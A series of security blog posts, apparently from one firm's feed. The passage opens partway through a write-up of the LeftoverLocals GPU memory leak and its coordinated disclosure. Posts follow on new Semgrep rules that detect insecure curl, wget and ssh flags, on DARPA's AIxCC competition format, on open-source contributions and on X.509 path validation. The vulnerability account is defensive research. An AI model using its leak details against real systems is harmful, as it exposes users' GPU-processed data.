As mentioned above, while we focus on LLM applications, GPU local memory is one of the first tools that a GPU developer uses when optimizing an application. Although other attacks would likely require analyzing the victim’s GPU kernel code to identify local memory usage, other attacks are likely possible in GPU compute domains, such as image processing and scientific computing. It will likely be increasingly difficult for users to detect and defend against these attacks since it’s unlikely they will know if their application is vulnerable to LeftoverLocals; this would require knowing the details of the exact GPU kernel code, which are often hidden away in highly optimized linear algebra libraries (e.g., CLBLAST). Additionally, an overall lack of specification in up-and-coming GPU platforms makes it difficult to determine whether the compiler or runtime will use impacted memory regions without the user knowing. For example, Apple GPUs have a new caching mechanism, called dynamic caching, that does not have a clear specification regarding if local memory regions are being used for other purposes.

Coordinated disclosure

Since September 2023, we have been working CERT/CC on a large coordinated disclosure involving all major GPU vendors, including NVIDIA, Apple, AMD, Arm, Intel, Qualcomm, and Imagination. Trail of Bits provided vendors a total of 125 days to test their products and provide remediations. The coordination gradually grew to include software stakeholders, including Google, Microsoft, and others, which allowed us to understand how LocalLeftovers impacts privacy requirements and impact at different stages in the ML supply chain. Apple did not respond or engage with us regarding the disclosure.

A high-level timeline of the disclosure is provided below:

  • September 8, 2023: Trail of Bits submitted report to the CERT/CC
  • September 11, 2023: CERT/CC acknowledged the submission of LeftoverLocals and began the process of vendor outreach and CVE assignment with a preliminary disclosure date of December 11, 2023
  • September 14, 2023: AMD acknowledged the CERT disclosure
  • September 15, 2023: Qualcomm acknowledged the CERT disclosure
  • September 22, 2023: The case report was shared with Khronos and OpenCL working group
  • September 29, 2023: NVIDIA acknowledged disclosure and confirmed they were not affected by the vulnerability
  • November 22, 2023: ToB extended release of embargo to January 16, 2024 to accommodate for vendor requests for further time
  • January 11, 2024: We received a notice that Qualcomm provided a patch to their firmware that addresses this issue only for some of their devices. Additionally, Google noted that ChromeOS Stable 120 and LTS 114 will be released on January 16 to include AMD and Qualcomm mitigations.
  • January 13, 2024: Apple confirmed that the A17 and M3 series processors contain fixes to the vulnerability.
  • January 14, 2024: Google notified us that they observed that that some Imagination GPUs are impacted.
  • January 16, 2024: Embargo lift and public disclosure of LeftoverLocals

Moving forward

Now that GPUs are being used in a wide range of applications, including privacy sensitive applications, we believe that the wider GPU systems community (vendors, researchers, developers) must work towards hardening the GPU system stack and corresponding specifications. This should be accomplished through robust, holistic specifications that describe both GPU programs’ behavior and how GPU devices integrate with the rest of the system stack (e.g., the OS or hypervisor). Furthermore, these specifications should be rigorously tested to account for the diversity of GPU systems and safety requirements of diverse application domains. Looking forward, a wide variety of new AI chips are being developed and will require rigorous security analysis.

There are positive developments in this direction. For example, AMD’s ROCm stack is open, and thus available for independent rigorous evaluation, and the Khronos Group has safety critical specification groups. Additionally, cross-vendor programming frameworks, such as Vulkan, have been incredibly useful for writing portable test suites, as opposed to single-vendor programming frameworks.

While GPU security and privacy guarantees are scattered and scarce, the Vulkan specification outlines a reasonable definition of security for GPU platforms to adhere to—a definition that several platforms clearly violate, as our results show:

… implementations must ensure that […] an application does not affect the integrity of the operating system[…]. In particular, any guarantees made by an operating system about whether memory from one process can be visible to another process or not must not be violated by a Vulkan implementation for any memory allocation.

Given the role of Khronos specifications in this result, we included the Khronos Group in the coordinated disclosure. They connected us with representatives of various impacted vendors, and engaged in fruitful discussions about security specifications and testing. Prior to the release, Khronos released this statement in support of this work:

Khronos welcomes the work by Tyler Sorensen and Trail of Bits to increase security around the usage of Khronos APIs and have been working closely with them for several months to ensure that API implementers are aware and able to act on any issues. Khronos is also diligently exploring additional actions relating to API specifications, conformance testing, and platform vendor cooperation to continually strengthen safety and security when using Khronos compute and rendering APIs. – Neil Trevett, Khronos President

With the dust settling, our position is the following: given the wide diversity of GPUs and their critical importance in enabling machine learning applications, these devices, and their ecosystems, are in need of (1) a detailed threat model that considers the various types of data processed on GPUs and how this data might be compromised; (2) an exploration of the GPU execution stack to determine where and how GPU security properties should be specified and implemented; and (3) significant testing and auditing to fortify GPU ecosystem, which is the computational foundation of machine learning.

For full transparency, we note that Tyler Sorensen has been an invited member of the Khronos group (sponsored by Google) since 2019, and participates in the memory model technical specification group.

Acknowledgements: We thank Max Ammann, Dominik Czarnota, Kelly Kaoudis, Jay Little, and Adelin Travers for their insightful comments and feedback on the vulnerability, PoC, and throughout the disclosure process. We also thank the Khronos Group for discussing technical specification details with us, and providing an avenue for us to engage with many vendors. We thank CERT/CC, specifically Vijay Sarvepalli and Ben Koo, for organizing the coordinated disclosure, especially considering the potential breadth of the vulnerability. Thanks to Adam Sorensen and Trent Brunson for helping create the vulnerability logo. Finally, thank you to everyone who engaged with us on this issue. This was a large project and we had discussions with many people who provided valuable insights and perspectives.

Background: How GPUs work

GPUs are massively parallel, throughput-oriented co-processors. While originally designed to accelerate graphics workloads, their design, which balances flexible programming and high computational throughput, has been highly effective in a variety of applications. Perhaps the most impactful current application domain is machine learning, where GPUs are the computational workhorse and achieve nearly all major results in this area.

GPUs are not only in large servers; they are in our phones, our tablets, and our laptops. These GPUs come from a variety of vendors, with almost all major hardware vendors (Apple, AMD, Arm, Qualcomm, Intel, and Imagination) producing their own GPU architecture. These GPUs are increasingly used for ML tasks, especially because doing ML locally can preserve users’ privacy, achieve lower latency, and reduce computational burdens on service providers.

GPU architecture: GPU architecture has a parallel, hierarchical structure. At the top level, a GPU is made up of Compute Units (sometimes called Streaming Multiprocessors in NVIDIA literature). Large, discrete GPUs contain many compute units, and smaller, mobile GPUs have fewer. For example, the large AMD Radeon RX 7900 XT discrete GPU has 84 compute units, while the mobile Qualcomm Adreno 740 GPU has 8. All compute units have access to global memory. On discrete GPUs, global memory is implemented using VRAM; on integrated GPUs, global memory simply uses the CPU’s main memory.

Compute units encapsulate both compute and memory components. Compute units contain an array of processing elements; these simple cores are the fundamental units of computation and execute a stream of GPU instructions. In terms of memory, compute units often contain a cache for global memory, but they also contain a special region of memory called local memory. This is an optimized memory region that is shared only across processing elements in the same compute unit. This memory can be accessed with significantly less latency than global memory, but also has much smaller capacity. Different GPUs have varying amounts of local memory, typically ranging from 16KB to 64KB. For example, the AMD Radeon RX 7900 XT GPU has 84 compute units and a local memory size of 64KB; thus, the total amount of local memory on the GPU is ~5MB. Local memory is a software-managed cache: the program executing on the processing elements is responsible for loading values into local memory (e.g., values that will be repeatedly used from global memory).

GPU execution model: A GPU program, called a (GPU) kernel, is written in a shader language. Common examples are SPIR-V (Vulkan), OpenCL C, (OpenCL), and Metal Shading Language (Metal). These kernels specify a single entry point function, called the kernel function, which is executed by many invocations (i.e., GPU threads). Invocations have unique built-in identifiers (such as a global ID), which can be used to index a unique data element in a data-parallel program. Invocations are further partitioned into workgroups. Each workgroup is mapped to a compute unit (although many workgroups may execute on the same compute unit, depending on resource requirements). All invocations have access to the same global memory, but only invocations in the same workgroup will share the same local memory.

Applications that use the GPU often launch many short-running kernels. These kernels often correspond to basic operations, such as matrix multiplication or convolution. Kernels can then be executed in sequence; for example, each layer in a deep neural network will be a kernel execution. Local memory is statically allocated at each kernel launch and is not specified to persist across kernel calls.

Platforms generally do not time-multiplex different GPU kernels. That is, if multiple kernels are launched simultaneously (e.g., by different users), the GPU will execute one kernel to competition before the next kernel starts. Because GPU kernels are typically short running, sharing GPU resources at kernel boundaries saves expensive preemption overhead while also maintaining acceptable latency in practice.

Terminology: Because this blog post focuses on portable GPU computing, it uses OpenCL GPU terminology. For readers more familiar with GPU terminology from a different framework (e.g., CUDA or Metal), we provide the following translation table:

30 new Semgrep rules: Ansible, Java, Kotlin, shell scripts, and more

17 January 2024 at 13:30

By Matt Schwager and Sam Alws

We are publishing a set of 30 custom Semgrep rules for Ansible playbooks, Java/Kotlin code, shell scripts, and Docker Compose configuration files. These rules were created and used to audit for common security vulnerabilities in the listed technologies. This new release of our Semgrep rules joins our public CodeQL queries and Testing Handbook in an effort to share our technical expertise with the security community. This blog post will briefly cover the new Semgrep rules, then go in depth on two lesser-known Semgrep features that were used to create these rules: generic mode and YAML support.

For this release of our internal Semgrep rules, we focused on issues like unencrypted network transport (HTTP, FTP, etc.), disabled SSL certificate verification, insecure flags specified for common command-line tools, unrestricted IP address binding, miscellaneous Java/Kotlin concerns, and more. Here are our new rules:

Mode Rule ID Rule description
Generic container-privileged Found container command with extended privileges
Generic container-user-root Found container command running as root
Generic curl-insecure Found curl command disabling SSL verification
Generic curl-unencrypted-url Found curl command with unencrypted URL (e.g., HTTP, FTP, etc.)
Generic gpg-insecure-flags Found gpg command using insecure flags
Generic installer-allow-untrusted Found installer command allowing untrusted installations
Generic openssl-insecure-flags Found openssl command using insecure flags
Generic ssh-disable-host-key-checking Found ssh command disabling host key checking
Generic tar-insecure-flags Found tar command using insecure flags
Generic wget-no-check-certificate Found wget command disabling SSL verification
Generic wget-unencrypted-url Found wget command  with unencrypted URL (e.g. HTTP, FTP, etc.)
Java, Kotlin gc-call Calling gc suggests to the JVM that the garbage collector should be run, and memory should be reclaimed. This is only a suggestion, and there is no guarantee that anything will happen. Relying on this behavior for correctness or memory management is an anti-pattern.
Java, Kotlin mongo-hostname-verification-disabled Found MongoDB client with SSL hostname verification disabled
YAML (Ansible) apt-key-unencrypted-url Found apt key download with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) apt-key-validate-certs-disabled Found apt key with SSL verification disabled
YAML (Ansible) apt-unencrypted-url Found apt deb with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) dnf-unencrypted-url Found dnf download with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) dnf-validate-certs-disabled Found dnf with SSL verification disabled
YAML (Ansible) get-url-unencrypted-url Found file download with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) get-url-validate-certs-disabled Found file download with SSL verification disabled
YAML (Ansible) rpm-key-unencrypted-url Found RPM key download with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) rpm-key-validate-certs-disabled Found RPM key with SSL verification disabled
YAML (Ansible) unarchive-unencrypted-url Found unarchive download with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) unarchive-validate-certs-disabled Found unarchive download with SSL verification disabled
YAML (Ansible) wrm-cert-validation-ignore Found Windows Remote Management connection with certificate validation disabled
YAML (Ansible) yum-unencrypted-url Found yum download with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) yum-validate-certs-disabled Found yum with SSL verification disabled
YAML (Ansible) zypper-repository-unencrypted-url Found Zypper repository with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) zypper-unencrypted-url Found Zypper package with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Docker Compose) port-all-interfaces Service port is exposed on all interfaces

Semgrep 201: intermediate features

Semgrep is a static analysis tool for finding code patterns. This includes security vulnerabilities, bug variants, secrets detection, performance and correctness concerns, and much more. While Semgrep includes a proprietary cloud offering and more advanced rules, Semgrep CLI is free to install and run locally. You can run Trail of Bits’ rules, including the rules mentioned above, with the following command:

semgrep scan --config p/trailofbits /path/to/code

This post will not go into all the details of each rule presented above. The basics of Semgrep have already been discussed extensively by both Trail of Bits and the broader security community, so this post will discuss two lesser-known Semgrep features in more depth: generic mode and YAML support.

generic mode

Semgrep’s generic mode provides an easy method for searching for arbitrary text. Unlike Semgrep’s syntactic support for programming languages like Java and Python, generic mode is glorified text search. Naturally, this provides both advantages and disadvantages: generic mode has a tendency to produce more false positives but also fewer false negatives. In other words, it produces more findings, but you may have to sift through them. Limiting rule paths is one way to avoid false positives. However, the primary reason for using generic mode is the breadth of data it can search.

generic mode can roughly be thought of as an ergonomic alternative to regular expressions. They both perform arbitrary text search, but generic mode offers improved handling of newlines and other white space. It also offers Semgrep’s familiar ellipsis operator, metavariables, and a tight integration with the rest of the Semgrep ecosystem for managing findings. Any text file or text-based data can be analyzed in generic mode, so it’s a great option when you want to analyze less commonly used formats such as Jinja templates, NGINX configuration files, HAML templates, TOML files, HTML content, or any other text-based format.

The primary disadvantage of generic mode is that it has no semantic understanding of the text it parses. This means, for example, that patterns may be incorrectly detected in commented code or other unintended places—in other words, false positives. For example, if we search for os.system(...) in both generic mode and python mode in the following code, we will get different results:

import os

# Uncomment when debugging
# os.system("debugger")

os.system("run_production")

Figure 1: Python code with a line commented out

$ semgrep scan --lang python --pattern "os.system(...)" test.py 
...                       
    test.py 
            6┆ os.system("run_production")
...
Ran 1 rule on 1 file: 1 finding.

Figure 2: python mode semantically understands the comment.

$ semgrep scan --lang generic --pattern "os.system(...)" test.py 
...                       
    test.py 
            4┆ # os.system("debugger")
            ⋮┆----------------------------------------
            6┆ os.system("run_production")
...
Ran 1 rule on 1 file: 2 findings.

Figure 3: generic mode does not semantically understand the comment.

Another disadvantage of generic mode is that it misses the extensive list of Semgrep equivalences. Despite this, we still felt it was the right tool for the job when searching for these specific patterns. Sifting through a few false positives is okay if it means we don’t miss a critical security bug.

Given generic mode’s disadvantages, why use it for many of the rules released in this post? After all, Semgrep has official language support for both Bash and Dockerfiles. But consider the ssh-disable-host-key-checking rule. Using generic mode will find SSH commands disabling StrictHostKeyChecking in Bash scripts, Dockerfiles, CI configuration, documentation files, system calls in various programming languages, or other places we may not even be considering. Using the official Bash or Dockerfile support will cover only a single use case. In other words, using generic mode gives us the broadest possible coverage for a relatively simple heuristic that is applicable in many different scenarios.

For more information, see Semgrep’s official documentation on generic pattern matching.

YAML support

In addition to generic mode, YAML support helps make Semgrep a one-stop shop for searching for code, or text, in basically any text-based file in your filesystem. And YAML is eating the world: Kubernetes configuration, AWS CloudFormation, Docker Compose, GitHub Actions, GitLab CI, Argo CD, Ansible, OpenAPI specifications, and yes, Semgrep rules themselves are even written in YAML. In fact, Semgrep has best practice rules written for Semgrep rules in Semgrep rules. Sem-ception.

Of course, you could write a basic utility in your programming language of choice that uses a mainstream YAML library to parse YAML and search for basic heuristics, but then you would be missing out on the rest of the Semgrep ecosystem. The fact that you can manage all these different types of files and file formats in one place is Semgrep’s killer feature. YAML rules sit next to Python rules, which sit next to Java rules, which sit next to generic rules. They all run in CI together, and findings can be managed in the same place. Ten tools for 10 types of files are no longer necessary.

We were recently engaged in an audit that included a large Ansible implementation. With this in mind, we set out to cover many of the basic security concerns one may expect in the Ansible.Builtin namespace. Searching for YAML patterns using Semgrep’s YAML rule format has a tendency to make your head spin, but once you get used to it, it becomes relatively formulaic. The highly structured nature of formats like JSON and YAML makes searching for patterns straightforward. The Ansible rules presented at the top of this post are relatively clear-cut, so instead let’s consider the port-all-interfaces rule patterns, which highlights the YAML functionality more distinctly:

patterns:
  - pattern-inside: |
      services:
        ...
  - pattern: |
      ports:
        - ...
        - "$PORT"
        - ...
  - focus-metavariable: $PORT
  - metavariable-regex:
      metavariable: $PORT
      regex: '^(?!127.\d{1,3}.\d{1,3}.\d{1,3}:).+'

Figure 4: patterns searching for ports listening on all interfaces

The | YAML block style indicator used in the pattern-inside and pattern operators states that the text below is a plaintext string, not additional Semgrep rule syntax. Semgrep then interprets this plaintext string as YAML. Again, the fact that this is YAML within YAML takes some squinting at first, but the rest of the rule is relatively straightforward Semgrep syntax.

The rule itself is looking for services binding to all interfaces. The Docker Compose documentation states that, by default, services will listen on 0.0.0.0 when specifying ports. This rule finds ports that don’t start with loopback addresses, like 127.0.0.1, which indicates they listen on all interfaces. This is not always a problem, but it can lead to issues like firewall bypass in certain circumstances.

Extend your reach with Semgrep

Semgrep is a great tool for finding bugs across many disparate technologies. This post introduced 30 new Semgrep rules and discussed two lesser-known features: generic mode and YAML support. Adding YAML and generic searching to Semgrep’s extensive list of supported programming languages makes it an even more universal tool. Heuristics for problematic code or infrastructure and their corresponding findings can be managed in a single location.

If you’d like to read more about our work on Semgrep, we have used its capabilities in several ways, such as securing machine learning pipelines, discovering goroutine leaks, and securing Apollo GraphQL servers.

Contact us if you’re interested in custom Semgrep rules for your project.

Our thoughts on AIxCC’s competition format

18 January 2024 at 14:00

By Michael Brown

Late last month, DARPA officially opened registration for their AI Cyber Challenge (AIxCC). As part of the festivities, DARPA also released some highly anticipated information about the competition: a request for comments (RFC) that contained a sample challenge problem and the scoring methodology. Prior rules documents and FAQs released by DARPA painted the competition’s broad strokes, but with this release, some of the finer details are beginning to emerge.

For those who don’t have time to pore over the 50+ pages of information made available to date, here’s a quick overview of the competition’s structure and our thoughts on it, including areas where we think improvements or clarifications are needed.

The AIxCC is a grand challenge from DARPA in the tradition of the Cyber Grand Challenge and Driverless Grand Challenge.

*** Disclaimer: AIxCC’s rules and scoring methods are subject to change. This summary is for our readership’s awareness and is NOT an authoritative document. Those interested in participating in AIxCC should refer to DARPA’s website and official documents for firsthand information. ***

The competition at a high level

Competing teams are tasked with building AI-driven, fully automated cyber reasoning systems (CRSs) that can identify and patch vulnerabilities in programs. The CRS cannot receive any human assistance while discovering and patching vulnerabilities in challenge projects. Challenge projects are modified versions of critical real-world software like the Linux kernel and the Jenkins automation server. CRSs must submit a proof of vulnerability (PoV) and a proof of understanding (PoU) and may submit a patch for each vulnerability they discover. These components are scored individually and collectively to determine the winning CRS.

The competition has four stages:

  • Registration (January–April 2024): Open and Small Business registration tracks are open for registration. After submitting their concept white papers, up to seven small businesses will be selected for a $1 million prize to fund their participation in AIxCC.
  • Practice Rounds (March–July 2024): Practice and familiarization rounds allow competitors to realistically test their systems.
  • Semifinals (August 2024 at DEF CON): In the first competition round, the top seven teams advance to the final round, each receiving a $2 million prize.
  • Finals (August 2025 at DEF CON): In the grand finale, the top three performing CRSs receive prizes of $4 million, $3 million, and $1.5 million, respectively.

Figure 1: AIxCC events overview

The challenge projects

The challenge projects that each team’s CRS must handle are modeled after real-world software and are very diverse. Challenge problems may include source code written in Java, Rust, Go, JavaScript, TypeScript, Python, Ruby, or PHP, but at least half of them will be C/C++ programs that contain memory corruption vulnerabilities. Other types of vulnerabilities that competitors should expect to see will be drawn from MITRE’s Top 25 Most Dangerous Software Weaknesses.

Challenge problems include source code, a modifiable build process and environment, test harnesses, and a public functionality test suite. Using APIs for these resources, competing CRSs must employ various types of AI/ML and conventional program analysis techniques to discover, locate, trigger, and patch vulnerabilities in the challenge problem. To score points, the CRS must submit a PoV and PoU and may submit a patch. The PoV is an input that will trigger the vulnerability via one of the provided test harnesses. The PoU must specify which sanitizers and harnesses (i.e., vulnerability type, perhaps a CWE number) the PoV will trigger and the lines of code that make up the vulnerability.

The RFC contains a sample challenge problem that reintroduces a vulnerability that was disclosed in 2021 back into the Linux kernel. The challenge problem example provided is a single function written in C with a heap-based buffer overflow vulnerability and an accompanying sample patch. Unfortunately, this example does not come with example fuzzing harnesses, a test suite, or a build harness. DARPA is planning to release more examples with more details in the future, starting with a new example challenge problem from the Jenkins automation server.

Scoring

Each competing CRS will be given an overall score calculated as a function of four components:

  • Vulnerability Discovery Score: Points are awarded for each PoV that triggers the AIxCC sanitizer specified in the accompanying PoU.
  • Program Repair Score: Points are awarded if a patch accompanying the PoV/PoU prevents AIxCC sanitizers from triggering and does not break expected functionality. A small bonus is applied if the patch passes a code linter without error.
  • Accuracy Multiplier: This multiplies the overall score to award CRSs with high accuracy (i.e., minimizing invalid or rejected PoVs, PoUs, and patches).
  • Diversity Multiplier: This multiplies the overall score to award CRSs that handle diverse sets of CWEs and source code languages.

There are a number of intricacies involved in how the scoring algorithm combines these components. For example, successfully patching a discovered vulnerability is incentivized highly to prevent competitors from focusing solely on vulnerability discovery and ignoring patching. If you’re interested in the detailed math, please check out the RFC scoring for details.

General thoughts on AIxCC’s format RFC

In general, we think AIxCC will help significantly advance the state of the art in automated vulnerability detection and remediation. This competition format is a major step beyond the Cyber Grand Challenge in terms of realism for several reasons—namely, the challenge problems 1) are made from real-world software and vulnerabilities, 2) include source code and are compiled to real-world binary formats, and 3) come in many different source languages for many different computing stacks.

Additionally, we think the focus on AI/ML–driven CRSs for this competition will help create new research areas by encouraging new approaches to software analysis problems that conventional approaches have been unable to solve (due to fundamental limits like the halting problem).

Concerns we’ve raised in our RFC response

DARPA has solicited feedback on their scoring algorithm and exemplar challenges by releasing them as an RFC. We responded to their RFC earlier this month and highlighted several concerns that are front of mind for us as we start building our system. We hope that the coming months bring clarifications or changes to address these concerns.

Construction of challenge problems

We have two primary concerns related to the challenge problems. First, it appears that the challenges will be constructed by reinjecting previously disclosed vulnerabilities into recent versions of an open-source project. This approach, especially for vulnerabilities that have been explained in detail in blog posts, is almost certainly contained in the training data of commercial large language models (LLMs) such as ChatGPT and Claude.

Given their high bandwidth for memorization, CRSs based on these models will be unfairly advantaged when detecting and patching these vulnerabilities compared to other approaches. Combined with the fact that LLMs are known to perform significantly worse on novel instances of problems, this strongly suggests that LLM-based CRSs that score highly in AIxCC will likely struggle when used outside the competition. As a result, we recommend that DARPA not use historic vulnerabilities that were disclosed before the training epoch for partner-provided commercial models to create challenge problems for the competition.

Second, it appears that all challenge problems will be created using open-source projects that will be known to competitors in advance of the competition. This will allow teams to conduct large-scale pre-analysis and specialize their LLMs, fuzzers, and static analyzers to the known source projects and their historical vulnerabilities. These CRSs would be too specific to the competition and may not be usable on different source projects without significant manual effort to retarget the CRSs. To address this potential problem, we recommend that at least 65% of challenge problems be made for source projects that are kept secret prior to each stage of the competition.

PoU granularity

We are concerned about the potential for the scoring algorithm to reject valid PoVs/PoUs if AIxCC sanitizers are overly granular. For example, CWE-787 (out-of-bounds write), CWE-125 (out-of-bounds read), and CWE-119 (out-of-bounds buffer operation) are all listed in the MITRE top 25 weaknesses report. All three could be valid to describe a single vulnerability in a challenge problem and are cross-listed in the CWE database. If multiple sanitizers are provided for each of these CWEs but only one is considered correct, it is possible for otherwise valid submissions to be rejected for failing to properly distinguish between three very closely related sanitizers. We recommend that AIxCC sanitizers be sufficiently coarse-grained to avoid unfair penalization of submitted PoUs.

Scoring

As currently designed, performance metrics (e.g., CPU runtime, memory overhead, etc.) are not directly addressed by the competition’s areas of excellence, nor are they factored into functionality scores for patches. Performance is a critical nonfunctional software requirement and an important aspect of patch effectiveness and patch acceptability. We think it’s important for patches generated by competing CRSs to maintain the program’s performance within an acceptable threshold. Without this consideration in scoring, it is possible for teams to submit patches that are valid and correct but ultimately so nonperforming that they would not be used in a real-world scenario. We recommend the competition’s functionality score be augmented with a performance component.

What’s next?

Although we’ve raised some concerns in our RFC response, we’re very excited for the official kickoff in March and the actual competition later this year in August. Look out for our next post in this series, where we will talk about how our prior work in this area has influenced our high-level approach and discuss the technical areas of this competition we find most fascinating.

Celebrating our 2023 open-source contributions

24 January 2024 at 14:00

At Trail of Bits, we pride ourselves on making our best tools open source, such as Slither, PolyTracker, and RPC Investigator. But while this post is about open source, it’s not about our tools…

In 2023, our employees submitted over 450 pull requests (PRs) that were merged into non-Trail of Bits repositories. This demonstrates our commitment to securing the software ecosystem as a whole and to improving software quality for everyone. A representative list of contributions appears at the end of this post, but here are some highlights:

  • Sigstore-conformance, a vital component of our Sigstore initiative in open-source engineering, functions as an integration test suite for diverse Sigstore client implementations. Ensuring conformity to the Sigstore client testing suite, it rigorously evaluates overall client behavior, addressing critical scenarios and aligning with ongoing efforts to establish an official Sigstore client specification. This workflow-focused testing suite seamlessly integrates into workflows with minimal configuration, offering comprehensive testing for Sigstore clients.
  • Protobuf-specs is another initiative in our open-source engineering. It is a collaborative repository for standardized data models and protocols across various Sigstore clients andhouses specifications for Sigstore messages. To update protobuf definitions, use Docker to generate protobuf stubs by running $ make all, resulting in Go and Python files under the ‘gen/’ directory.
  • pyOpenSSL stands as the predominant Python library for integrating OpenSSL functionality. Over approximately the past nine months, we have been actively involved in cleanup and maintenance tasks on pyOpenSSL as part of our contract with the STF. pyOpenSSL serves as a thin wrapper around a subset of the OpenSSL library, where many object methods simply invoke corresponding functions in the OpenSSL library.
  • Homebrew-core serves as the central repository for the default Homebrew tap, encompassing a collection of software packages and associated formulas for seamless installations. Once you’ve configured Homebrew on your Mac or Linux system, you gain the ability to execute “brew install” commands for software available in this repository. Emilio Lopez, an application security engineer, actively contributed to this repository by submitting several pull requests and introducing new formulas or updating existing ones. Emilio’s focus has predominantly been on tools developed by ToB, such as crytic-compile, solc-select, Caracal, and others. Consequently, individuals can effortlessly install these tools with a straightforward “brew install” command, streamlining the installation process.
  • Ghidra, a National Security Agency Research Directorate creation, is a powerful software reverse engineering (SRE) framework. It offers advanced tools for code analysis on Windows, macOS, and Linux, including disassembly, decompilation, and scripting. Supporting various processor instruction sets, Ghidra serves as a customizable SRE research platform, aiding in the analysis of malicious code for cybersecurity purposes. We fixed numerous bugs to enhance its functionality, particularly in support of our work on DARPA’s AMP (Assured Micropatching) program.

We would like to acknowledge that submitting a PR is only a tiny part of the open-source experience. Someone has to review the PR. Someone has to maintain the code after the PR is merged. And submitters of earlier PRs have to write tests to ensure the functionality of their code is preserved.

We contribute to these projects in part because we love the craft, but also because we find these projects useful. For this, we offer the open-source community our most sincere thanks and wish everyone a happy, safe, and productive 2024!

Some of Trail of Bits’ 2023 open-source contributions

AI/ML

Cryptography

Languages and compilers

Libraries

Tech infrastructure

Software analysis tools

Blockchain software

Reverse engineering tools

Software analysis/transformational tools

Packing ecosystem/supply chain

We build X.509 chains so you don’t have to

25 January 2024 at 14:00

By William Woodruff

For the past eight months, Trail of Bits has worked with the Python Cryptographic Authority to build cryptography-x509-verification, a brand-new, pure-Rust implementation of the X.509 path validation algorithm that TLS and other encryption and authentication protocols are built on. Our implementation is fast, standards-conforming, and memory-safe, giving the Python ecosystem a modern alternative to OpenSSL’s misuse- and vulnerability-prone X.509 APIs for HTTPS certificate verification, among other protocols. This is a foundational security improvement that will benefit every Python network programmer and, consequently, the internet as a whole.

Our implementation has been exposed as a Python API and is included in Cryptography’s 42.0.0 release series, meaning that Python developers can take advantage of it today! Here’s an example usage, demonstrating its interaction with certifi as a root CA bundle:

As part of our design we also developed x509-limbo, a test vector and harness suite for evaluating the standards conformance and consistent behavior of various X.509 path validation implementations. x509-limbo is permissively licensed and reusable, and has already found validation differentials across Go’s crypto/x509, OpenSSL, and two popular pre-existing Rust X.509 validators.

X.509 path validation

X.509 and path validation are both too expansive to reasonably summarize in a single post. Instead, we’ll grossly oversimplify X.509 to two basic facts:

  1. X.509 is a certificate format: it binds a public key and some metadata for that key (what it can be used for, the subject it identifies) to a signature, which is produced by a private key. The subject of a certificate can be a domain name, or some other relevant identifier.
  2. Verifying an X.509 certificate entails obtaining the public key for its signature, using that public key to check the signature, and (finally) validating the associated metadata against a set of validity rules (sometimes called an X.509 profile). In the context of the public web, there are two profiles that matter: RFC 5280 and the CA/B Forum Baseline Requirements (“CABF BRs”).

These two facts make X.509 certificates chainable: an X.509 certificate’s signature can be verified by finding the parent certificate containing the appropriate public key; the parent, in turn, has its own parent. This chain building process continues until an a priori trusted certificate is encountered, typically because of trust asserted in the host OS itself (which maintains a pre-configured set of trusted certificates).

Chain building (also called “path validation”) is the cornerstone of TLS’s authentication guarantees: it allows a web server (like x509-limbo.com) to serve an untrusted “leaf” certificate along with zero or more untrusted parents (called intermediates), which must ultimately chain to a root certificate that the connecting client already knows and trusts.

As a visualization, here is a valid certificate chain for x509-limbo.com, with arrows representing the “signed by” relationship:

In this scenario, x509-limbo.com serves us two initially untrusted certificates: the leaf certificate for x509-limbo.com itself, along with an intermediate (Let’s Encrypt R3) that signs for the leaf.

The intermediate in turn is signed for by a root certificate (ISRG Root X1) that’s already trusted (by virtue of being in our OS or runtime trust store), giving us confidence in the complete chain, and thus the leaf’s public key for the purposes of TLS session initiation.

What can go wrong?

The above explanation of X.509 and path validation paints a bucolic picture: to build the chain, we simply iterate through our parent candidates at each step, terminating on success once we reach a root of trust or with failure upon exhausting all candidates. Simple, right?

Unfortunately, the reality is far messier:

  • The abstraction above (“one certificate, one public key”) is a gross oversimplification. In reality, a single public key (corresponding to a single “logical” issuing authority) may have multiple “physical” certificates, for cross-issuance purposes.
  • Because the trusted set is defined by the host OS or language runtime, there is no “one true” chain for a given leaf certificate. In reality, most (leaf, [intermediates]) tuples have several candidate solutions, of which any is a valid chain.
    • This is the “why” for the first bullet: a web server can’t guarantee that any particular client has any particular set of trusted roots, so intermediate issuers typically have multiple certificates for a single public key to maximize the likelihood of a successfully built chain.
  • Not all certificates are made equal: certificates (including different “physical” certificates for the same “logical” issuing authority) can contain constraints that prevent otherwise valid paths: name restrictions, overall length restrictions, usage restrictions, and so forth. In other words, a correct path building implementation must be able to backtrack after encountering a constraint that eliminates the current candidate chain.
  • The X.509 profile itself can impose constraints on both the overall chain and its constituent members: the CABF BRs, for example, forbid known-weak signature algorithms and public key types, and many path validation libraries additionally allow users to constrain valid chain constructions below a configurable maximum length.

In practice, these (non-exhaustive) complications mean that our simple recursive linear scan for chain building is really a depth-first graph search with both static and dynamic constraints. Failing to treat it as such has catastrophic consequences:

  • Failing to implement a dynamic search typically results in overly conservative chain constructions, sometimes with Internet-breaking outcomes. OpenSSL 1.0.x’s inability to build the “chain of pain” in 2020 is one recent example of this.
  • Failing to honor the interior constraints and profile-wide certificate requirements can result in overly permissive chain constructions. CVE-2021-3450 is one recent example of this, causing some configurations of OpenSSL 1.1.x to accept chains built with non-CA certificates.

Consequently, building both correct and maximal (in the sense of finding any valid chain) X.509 path validator is of the utmost importance, both for availability and security.

Quirks, surprises, and ambiguities

Despite underpinning the Web PKI and other critical pieces of Internet infrastructure, there are relatively few independent implementations of X.509 path validation: most platforms and languages reuse one of a small handful of common implementations (OpenSSL and its forks, NSS, Go’s crypto/x509, GnuTLS, etc.) or the host OS’s implementation (CryptoAPI on Windows, Security on macOS). This manifests as a few recurring quirks and ambiguities:

  • A lack of implementation diversity means that mistakes and design decisions (such as overly or insufficiently conservative profile checks) leak into other implementations: users complain when a PKI deployment that was only tested on OpenSSL fails to work against crypto/x509, so implementations frequently bend their specification adherence to accommodate real-world certificates.
